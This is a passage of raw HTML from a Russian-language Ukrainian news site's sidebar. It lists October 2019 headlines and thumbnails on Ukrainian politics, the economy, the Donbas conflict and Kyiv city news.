src="https://enovosty.com/wp-content/uploads/2019/10/1570044884_dorogahorosh-e1571327260145.jpg"></a><a href="https://enovosty.com/news-auto/full/1710-v-ukraine-sobirayutsya-usilit-kontrol-nad-bezopasnostyu-na-dorogax" title="В Украине собираются усилить контроль над безопасностью на дорогах" class="name">В Украине собираются усилить контроль над безопасностью на дорогах <span>(902)</span></a></li></ul></li><li><ul class="tact"><li id="li3" style="width:210px;"><a href="https://enovosty.com/news_society/full/1710-v-ukraine-provedut-proverku-vsex-pensionerov-podrobnosti" title="В Украине проведут проверку всех пенсионеров: подробности"><img width="210" height="156" alt="В Украине проведут проверку всех пенсионеров: подробности" src="https://enovosty.com/wp-content/uploads/2019/10/maincover_social-nye-vyplaty-na-rebenka1486381320.jpg-700x400.jpg"></a><a href="https://enovosty.com/news_society/full/1710-v-ukraine-provedut-proverku-vsex-pensionerov-podrobnosti" title="В Украине проведут проверку всех пенсионеров: подробности" class="name">В Украине проведут проверку всех пенсионеров: подробности <span>(3066)</span></a></li></ul></li><li><ul class="tact"><li id="li4" style="width:210px;"><a href="https://enovosty.com/news_society/full/1710-v-vsu-vvodyat-novye-voinskie-zvaniya" title="В ВСУ вводят новые воинские звания, соответствующие стандартам НАТО"><img width="210" height="156" alt="В ВСУ вводят новые воинские звания, соответствующие стандартам НАТО" src="https://enovosty.com/wp-content/uploads/2019/10/11-1-1.jpg"></a><a href="https://enovosty.com/news_society/full/1710-v-vsu-vvodyat-novye-voinskie-zvaniya" title="В ВСУ вводят новые воинские звания, соответствующие стандартам НАТО" class="name">В ВСУ вводят новые воинские звания, соответствующие стандартам НАТО <span>(829)</span></a></li></ul></li><li><ul class="tact"><li id="li5" style="width:210px;"><a href="https://enovosty.com/news_economy/full/1710-vsemirnyj-bank-uluchshil-prognoz-rosta-vvp-ukrainy" title="Всемирный банк улучшил прогноз роста ВВП Украины"><img width="210" height="156" alt="Всемирный банк улучшил прогноз роста ВВП Украины" src="https://enovosty.com/wp-content/uploads/2019/10/im578x383-world-bank_therealnews-1.png"></a><a href="https://enovosty.com/news_economy/full/1710-vsemirnyj-bank-uluchshil-prognoz-rosta-vvp-ukrainy" title="Всемирный банк улучшил прогноз роста ВВП Украины" class="name">Всемирный банк улучшил прогноз роста ВВП Украины <span>(214)</span></a></li></ul></li><li><ul class="tact"><li id="li6" style="width:210px;"><a href="https://enovosty.com/news_politics/full/1710-ukraincam-budut-razdavat-dengi-za-zhaloby-na-korrupciyu" title="Украинцам будут раздавать деньги за жалобы на коррупцию"><img width="210" height="156" alt="Украинцам будут раздавать деньги за жалобы на коррупцию" src="https://enovosty.com/wp-content/uploads/2019/10/preview.jpg"></a><a href="https://enovosty.com/news_politics/full/1710-ukraincam-budut-razdavat-dengi-za-zhaloby-na-korrupciyu" title="Украинцам будут раздавать деньги за жалобы на коррупцию" class="name">Украинцам будут раздавать деньги за жалобы на коррупцию <span>(1055)</span></a></li></ul></li><li><ul class="tact"><li id="li7" style="width:210px;"><a href="https://enovosty.com/news_economy/full/1710-biznes-na-pozitive-dvum-tretyam-ukraincev-skoro-povysyat-zarplatu" title="Бизнес на позитиве: Двум третям украинцев скоро повысят зарплату"><img width="210" height="156" alt="Бизнес на позитиве: Двум третям украинцев скоро повысят зарплату" src="https://enovosty.com/wp-content/uploads/2019/10/investory-ekonomyat-na-sotrudnikax-chtoby-kompensirovat-riski-vedeniya-biznesa-v-ukraine-ekspert-e1571298952855.jpg"></a><a href="https://enovosty.com/news_economy/full/1710-biznes-na-pozitive-dvum-tretyam-ukraincev-skoro-povysyat-zarplatu" title="Бизнес на позитиве: Двум третям украинцев скоро повысят зарплату" class="name">Бизнес на позитиве: Двум третям украинцев скоро повысят зарплату <span>(622)</span></a></li></ul></li><li><ul class="tact"><li id="li8" style="width:210px;"><a href="https://enovosty.com/news_economy/full/1710-v-ukraine-xotyat-oficialno-razbavlyat-benzin-v-chyom-sut" title="В Украине хотят официально разбавлять бензин. В чём суть?"><img width="210" height="156" alt="В Украине хотят официально разбавлять бензин. В чём суть?" src="https://enovosty.com/wp-content/uploads/2019/10/zapravka.jpg"></a><a href="https://enovosty.com/news_economy/full/1710-v-ukraine-xotyat-oficialno-razbavlyat-benzin-v-chyom-sut" title="В Украине хотят официально разбавлять бензин. В чём суть?" class="name">В Украине хотят официально разбавлять бензин. В чём суть? <span>(736)</span></a></li></ul></li><li><ul class="tact"><li id="li9" style="width:210px;"><a href="https://enovosty.com/news_politics/full/1710-boeviki-podlo-atakovali-vsu-poyavilis-tragicheskie-novosti" title="Боевики подло атаковали ВСУ: Появились трагические новости"><img width="210" height="156" alt="Боевики подло атаковали ВСУ: Появились трагические новости" src="https://enovosty.com/wp-content/uploads/2019/10/voyna-1.jpg"></a><a href="https://enovosty.com/news_politics/full/1710-boeviki-podlo-atakovali-vsu-poyavilis-tragicheskie-novosti" title="Боевики подло атаковали ВСУ: Появились трагические новости" class="name">Боевики подло атаковали ВСУ: Появились трагические новости <span>(808)</span></a></li></ul></li></ul></div><div class="wiget simple_pr"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><div class="blogTitle"><p style="font-size:8pt;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=507&pid=11263" rel="bookmark">Лучшие фотограф дикой природы 2019</a></p><div style="text-align:center;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=507&pid=11263" rel="bookmark"> <img alt="Фото недели" src="https://enovosty.com/wp-content/gallery/of-the-year-2019/thumbs/thumbs_06.jpg"></a></div></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Новости Киева</p></div><div class='cls'></div><span class='news_date'>18.10.2019 г.</span><br /><div class="post_news"><span id="post-4778294"><span class="postDate">16:18</span><a class="postTitle" href="https://enovosty.com/news_kiev/full/1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom">Сергей Петрик рассказал о мерах борьбы с незаконным строительством</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4778219"><span class="postDate">12:15</span><a class="postTitle" href="https://enovosty.com/news_kiev/full/1810-stalo-izvestno-kogda-zakonchitsya-remont-darnickoj-ploshhadi-v-kieve">Стало известно, когда закончится ремонт Дарницкой площади в Киеве</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>17.10.2019 г.</span><br /><div class="post_news"><span id="post-4778114"><span class="postDate">16:34</span><a class="postTitle" href="https://enovosty.com/news_kiev/full/1710-v-kieve-posredi-oseni-rascveli-sakury">В Киеве посреди осени расцвели сакуры</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>15.10.2019 г.</span><br /><div class="post_news"><span id="post-4777643"><span class="postDate">11:21</span><a class="postTitle" href="https://enovosty.com/news_kiev/full/1510-kogda-postroyat-metro-na-troeshhinu-otvet-merii">Когда построят метро на Троещину - ответ мэрии</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4777635"><span class="postDate">10:28</span><a class="postTitle" href="https://enovosty.com/news_kiev/full/1510-zapret-na-prodazhu-alkogolya-v-stolice-v-voprose-postavlena-tochka">Запрет на продажу алкоголя в столице. В вопросе поставлена точка</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>14.10.2019 г.</span><br /><div class="post_news"><span id="post-4777604"><span class="postDate">21:19</span><a class="postTitle" href="https://enovosty.com/news_kiev/full/1410-v-kieve-zavershilsya-masshabnyj-marsh-ni-kapitulyacii-foto">В Киеве завершился масшабный марш "Ні капітуляції!" (ФОТО)</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>13.10.2019 г.</span><br /><div class="post_news"><span id="post-4777455"><span class="postDate">09:57</span><a class="postTitle" href="https://enovosty.com/news_kiev/full/1310-s-1-noyabrya-2019-goda-v-nazemnom-transporte-kievpastransa-razreshat-oplachivat-proezd-bankovskimi-kartami">С 1 ноября 2019 года в наземном транспорте «Киевпастранса» разрешат оплачивать проезд банковскими картами</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/news_kiev">Все новости киева</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">18.10.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/finance/full/1810-peregovory-ukrainy-s-mvf-o-novom-kredite-kak-budut-reshat-vopros-s-privatbankom">Переговоры Украины с МВФ о новом кредите: как будут решать вопрос с «ПриватБанком»?</a></p><div class="cblock"><a href="https://enovosty.com/finance/full/1810-peregovory-ukrainy-s-mvf-o-novom-kredite-kak-budut-reshat-vopros-s-privatbankom"><img width="230" alt="Переговоры Украины с МВФ о новом кредите: как будут решать вопрос с «ПриватБанком»?" src="/wp-content/uploads/2019/10/mvf.jpeg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/finance/full/1810-peregovory-ukrainy-s-mvf-o-novom-kredite-kak-budut-reshat-vopros-s-privatbankom">На этой неделе украинская делегация отправилась в Вашингтон, чтобы встретиться с представителями Международного валютного фонда (МВФ) и Всемирного банка ...</a></span></div><div class="block"><div class="info"><span class="postDate">17.10.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/1710-itogi-dnya-cena-korrupcionera-shkolnye-shtrafy-i-vybroshennoe-moshhnoe-pismo-trampa">Итоги дня: Цена коррупционера, школьные штрафы и выброшенное "мощное" письмо Трампа</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/1710-itogi-dnya-cena-korrupcionera-shkolnye-shtrafy-i-vybroshennoe-moshhnoe-pismo-trampa"><img width="230" alt="Итоги дня: Цена коррупционера, школьные штрафы и выброшенное мощное письмо Трампа" src="/wp-content/uploads/2019/10/1185091-1.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/1710-itogi-dnya-cena-korrupcionera-shkolnye-shtrafy-i-vybroshennoe-moshhnoe-pismo-trampa">Рада приняла законопроект о разоблачителях коррупции, бывшего первого заместителя секретаря СНБО Олега Гладковского задержало НАБУ, а ЕСПЧ раскритиковал ...</a></span></div><div class="block"><div class="info"><span class="postDate">16.10.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/1610-itogi-dnya-isterika-kremlya-pozitiv-ot-mvf-i-unikalnaya-operaciya-vsu">Итоги дня: Истерика Кремля, новшества от МВФ и уникальная операция ВСУ</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/1610-itogi-dnya-isterika-kremlya-pozitiv-ot-mvf-i-unikalnaya-operaciya-vsu"><img width="230" alt="Итоги дня: Истерика Кремля, новшества от МВФ и уникальная операция ВСУ" src="/wp-content/uploads/2019/10/1554985572-3952-1-e1571248931828.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/1610-itogi-dnya-isterika-kremlya-pozitiv-ot-mvf-i-unikalnaya-operaciya-vsu">Требование Украины в Минске озадачило Кремль, глава правительства Алексей Гончарук прояснил ситуацию со своей научной степенью, а бойцы ВСУ сняли на ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>18.10.2019 г.</span><br /><div class="post_news"> <span id="post-4778298"> <span class="postDate">17:01</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1810-zakon-o-rynke-zemli-ne-predusmatrivaet-zashhitu-i-soxranenie-s-x-ugodij-ekologi">Закон о рынке земли не предусматривает защиту и сохранение с/х угодий - экологи</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778301"> <span class="postDate">16:59</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1810-zachem-putinu-ocherednoj-shtorm-v-katalonii">Зачем Путину очередной "шторм" в Каталонии</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778299"> <span class="postDate">16:55</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1810-pozicij-dlya-otvoda-vsu-na-donbasse-ne-sushhestvuet-sofiya-fedina-video">Позиций для отвода ВСУ на Донбассе не существует, - София Федина (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778296"> <span class="postDate">16:32</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1810-prezidentom-evropejskogo-centrobanka-utverdili-kristin-lagard">Президентом Европейского центробанка утвердили Кристин Лагард</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778294"> <span class="postDate">16:18</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom">Сергей Петрик рассказал о мерах борьбы с незаконным строительством</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778292"> <span class="postDate">15:55</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1810-rost-ukrainskoj-ekonomiki-uskorilsya-smolij">Рост украинской экономики ускорился, - Смолий</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778290"> <span class="postDate">15:31</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1810-za-dejstviyami-rossijskoj-armii-sledyat-iz-kosmosa-pristajko">За действиями российской армии следят из космоса – Пристайко</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778288"> <span class="postDate">15:23</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1810-gosbyudzhet-2020-eto-byudzhet-epoxi-vymiraniya-aleksej-goncharenko-video">Госбюджет-2020 - это бюджет эпохи вымирания, - Алексей Гончаренко (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778286"> <span class="postDate">15:03</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1810-v-katalonskix-sobytiyax-prosmatrivaetsya-chetkij-interes-kremlya-zloj-odessit">В каталонских событиях просматривается четкий интерес Кремля, - Злой Одессит</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778157"> <span class="postDate">15:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1810-eksperty-preduprezhdayut-chto-plan-turcii-navodnit-evropu-millionami-bezhencev-yavlyaetsya-realnoj-i-opasnoj-ugrozoj">Эксперты предупреждают, что план Турции наводнить Европу миллионами беженцев является реальной и опасной угрозой</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778242"> <span class="postDate">14:55</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1810-ukraina-planiruet-soedinit-chernoe-more-s-baltijskim-do-1-maya-2020-goda">Украина планирует соединить Черное море с Балтийским до 1 мая 2020 года</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778231"> <span class="postDate">14:45</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1810-stalo-izvestno-s-kakoj-skorostyu-na-samom-dele-ezdyat-kievskie-voditeli">Стало известно, с какой скоростью на самом деле ездят киевские водители</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778267"> <span class="postDate">14:42</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1810-dialoga-s-narodom-ne-budet-deputaty-tajno-reshili-sudbu-rynka-zemli-v-ukraine-oksana-savchuk-video">Диалога с народом не будет, депутаты «тайно» решили судьбу рынка земли в Украине, - Оксана Савчук (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778241"> <span class="postDate">14:30</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1810-v-polshe-uvelichilos-kolichestvo-ukraincev-na-rukovodyashhix-dolzhnostyax">В Польше увеличилось количество украинцев на руководящих должностях</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778240"> <span class="postDate">14:15</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1810-sinoptiki-rasskazali-chego-zhdat-ot-pogody-v-oktyabre">Синоптики рассказали, чего ждать от погоды в октябре</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778238"> <span class="postDate">14:00</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1810-v-es-rastut-prodazhi-avtomobilej-pochemu-eto-proisxodit">В ЕС растут продажи автомобилей: почему это происходит</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778236"> <span class="postDate">13:45</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1810-na-novyj-god-ukraincy-budut-otdyxat-chetyre-dnya-podryad">На Новый год украинцы будут отдыхать четыре дня подряд</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778233"> <span class="postDate">13:30</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1810-samsung-zapatentoval-smartfon-s-obratnoj-chelkoj-foto">Samsung запатентовал смартфон с “обратной челкой” (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778229"> <span class="postDate">13:15</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1810-lis-u-smartfoni-v-ukraine-zapustili-onlajn-kartu-rubki-derevev">«Ліс у смартфоні»: В Украине запустили онлайн-карту рубки деревьев</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778275"> <span class="postDate">13:01</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1810-znaki-kachestva-rossii-ot-gryaznoj-nefti-k-gryaznoj-pshenice-zloj-odessit">Знаки качества России: от “грязной нефти” к “грязной пшенице”, - "Злой одессит"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778228"> <span class="postDate">13:00</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1810-sezon-2019-goda-stal-samym-uspeshnym-v-istorii-dlya-prodavcov-motocikletnoj-texniki">Сезон 2019 года стал самым успешным в истории для продавцов мотоциклетной техники</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778274"> <span class="postDate">12:57</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1810-sorvannoe-razvedenie-sil-ukraina-stroit-novye-pozicii-na-donbasse">Сорванное разведение сил: Украина строит новые позиции на Донбассе</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778225"> <span class="postDate">12:45</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1810-44-rebenka-za-36-let-v-ugande-nashli-samuyu-mnogodetnuyu-mat-v-mire">44 ребенка за 36 лет: В Уганде нашли самую многодетную мать в мире</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778222"> <span class="postDate">12:30</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1810-v-xersonskoj-oblasti-gotovyat-k-zapusku-gosudarstvennuyu-sluzhbu-schastya">В Херсонской области готовят к запуску государственную Службу счастья</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778219"> <span class="postDate">12:15</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/1810-stalo-izvestno-kogda-zakonchitsya-remont-darnickoj-ploshhadi-v-kieve">Стало известно, когда закончится ремонт Дарницкой площади в Киеве</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778272"> <span class="postDate">12:13</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1810-kolomojskomu-vygodno-chtoby-slushaniya-v-mezhdunarodnyx-sudax-byli-vozobnovleny-analitik">Коломойскому выгодно, чтобы слушания в международных судах были возобновлены - аналитик</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778271"> <span class="postDate">12:09</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1810-proekt-kremlya-troyanskij-kon-lugandnii-poterpel-porazhenie-piontkovskij">Проект Кремля "Троянский конь Луганд*нии" потерпел поражение, - Пионтковский</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778270"> <span class="postDate">12:04</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1810-v-polshe-vzletel-spros-na-ukraincev-upravlencev-kak-menyaetsya-kartina">В Польше взлетел спрос на украинцев-управленцев. Как меняется картина?</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778269"> <span class="postDate">12:02</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1810-ukrainskaya-zemlya-i-inostrancy-v-rade-neozhidanno-podderzhali-novyj-dokument">Украинская земля и иностранцы. В Раде неожиданно поддержали новый документ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778268"> <span class="postDate">12:00</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1810-ukraina-prinyala-vse-zakony-dlya-amnistii-na-donbasse-poyavilis-detali">Украина приняла все законы для амнистии на Донбассе. Появились детали</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778160"> <span class="postDate">12:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1810-amerikanskaya-razvedka-obnarodovala-novye-dannye-o-yadernoj-avarii-pod-arxangelskom-v-avguste">Американская разведка обнародовала новые данные о ядерной аварии под Архангельском в августе</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778266"> <span class="postDate">11:08</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1810-deputatov-deputatov-vr-ukrainy-prevratili-v-banalnyx-knopkodavov-irina-gerashhenko-video">Депутатов ВР Украины превратили в банальных «кнопкодавов», - Ирина Геращенко (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778264"> <span class="postDate">11:00</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/1810-v-ukraine-massovo-zakryvayutsya-molochnye-fermy-ceny-letyat-vverx">В Украине массово закрываются молочные фермы. Цены летят вверх</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778265"> <span class="postDate">10:23</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/1810-getmancev-vystilaet-dorogu-v-ad-dlya-vsej-sistemy-v-celom-politolog">Гетманцев выстилает дорогу в ад для всей системы в целом, - политолог</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778262"> <span class="postDate">10:20</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1810-v-rpc-otomstili-grecheskoj-cerkvi-za-priznanie-avtokefalii-pcu">В РПЦ "отомстили" Греческой церкви за признание автокефалии ПЦУ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778260"> <span class="postDate">09:47</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1810-v-belom-dome-sluchajno-proboltalis-o-davlenii-na-ukrainu">В Белом доме случайно проболтались о давлении на Украину</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778261"> <span class="postDate">09:20</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1810-stalo-izvestno-o-sudbe-lgot-dlya-veteranov">Стало известно о судьбе льгот для ветеранов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778259"> <span class="postDate">08:47</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/1810-uchenye-naglyadno-pokazali-posledstviya-yadernogo-udara-video">Ученые наглядно показали последствия ядерного удара (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778257"> <span class="postDate">08:38</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1810-putin-uxodit-s-donbassa-analitik-rasskazal-o-vazhnom-signale">Путин уходит с Донбасса? Аналитик рассказал о важном сигнале</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778256"> <span class="postDate">08:36</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1810-putin-pytaetsya-uderzhat-padayushhie-ceny-na-neft-anti-colorados">Путин пытается удержать падающие цены на нефть, - Аnti-colorados</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778254"> <span class="postDate">08:35</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1810-skandalnaya-perepiska-slugi-naroda-genprokuror-vpervye-otreagiroval">Скандальная переписка "Слуги народа": Генпрокурор впервые отреагировал</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778253"> <span class="postDate">08:31</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1810-vojna-na-donbasse-separatisty-otkryli-ogon-iz-artillerii">Война на Донбассе: Сепаратисты открыли огонь из артиллерии</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778195"> <span class="postDate">07:50</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1810-v-ukrainskoj-armii-bolshe-ne-budet-praporshhikov-zvanie-uprazdnili">В украинской армии больше не будет прапорщиков: звание упразднили</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778191"> <span class="postDate">07:40</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1810-na-kievskix-ulicax-zasvetilas-legendarnaya-model-bentley-speed-6">На киевских улицах засветилась легендарная модель Bentley Speed 6</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778184"> <span class="postDate">07:25</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1810-pochemu-erdogan-proigral-osnovnye-oshibki-kotorye-sovershila-turciya-v-svoej-operacii-v-sirii">Почему Эрдоган проиграл: основные ошибки, которые совершила Турция в своей операции в Сирии</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778168"> <span class="postDate">07:10</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1810-stalo-izvestno-o-pytkax-kotorye-primenyala-armiya-vo-vremya-grazhdanskoj-vojny-v-sirii">Стало известно о пытках, которые применяла армия во время гражданской войны в Сирии</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778163"> <span class="postDate">07:00</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1810-f-22-stealth-raptor-mozhet-li-on-ostatsya-samym-moshhnym-v-mire-istrebitelem">F-22 Stealth Raptor: может ли он остаться самым мощным в мире истребителем?</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>17.10.2019 г.</span><br /><div class="post_news"> <span id="post-4778153"> <span class="postDate">22:50</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1710-v-elektromobilyax-tesla-obnaruzhili-sereznuyu-neispravnost-chem-eto-grozit">В электромобилях Tesla обнаружили серьезную неисправность: чем это грозит</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778156"> <span class="postDate">22:35</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1710-ministr-obrazovaniya-rasskazala-o-vno-2019-v-selskoj-mestnosti-rezultaty-ne-raduyut">Министр образования рассказала о ВНО-2019 в сельской местности, - результаты не радуют</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778149"> <span class="postDate">22:25</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1710-armiya-ssha-gotovitsya-ispytat-oruzhie-sposobnoe-strelyat-na-rasstoyanie-pochti-2000-km">Армия США готовится испытать оружие, способное стрелять на расстояние почти 2000 км</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778146"> <span class="postDate">22:10</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1710-v-ukraine-sobirayutsya-usilit-kontrol-nad-bezopasnostyu-na-dorogax">В Украине собираются усилить контроль над безопасностью на дорогах</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778142"> <span class="postDate">22:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1710-vrazhdebnost-turcii-i-amerikanskoe-predatelstvo-v-sirii-sozdayut-novyj-krizis-dlya-kurdov">Враждебность Турции и американское предательство в Сирии создают новый кризис для курдов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778217"> <span class="postDate">21:59</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1710-v-parizhskom-zooparke-svini-nauchilis-kopat-zemlyu-palkami">В парижском зоопарке свиньи научились копать землю палками</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778205"> <span class="postDate">21:40</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1710-rossiya-uvelichila-vremya-zaderzhki-ukrainskix-sudov-v-kerchenskom-prolive">РФ увеличила время задержки украинских судов в Керченском проливе</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778203"> <span class="postDate">21:35</span> <a class="postTitle" 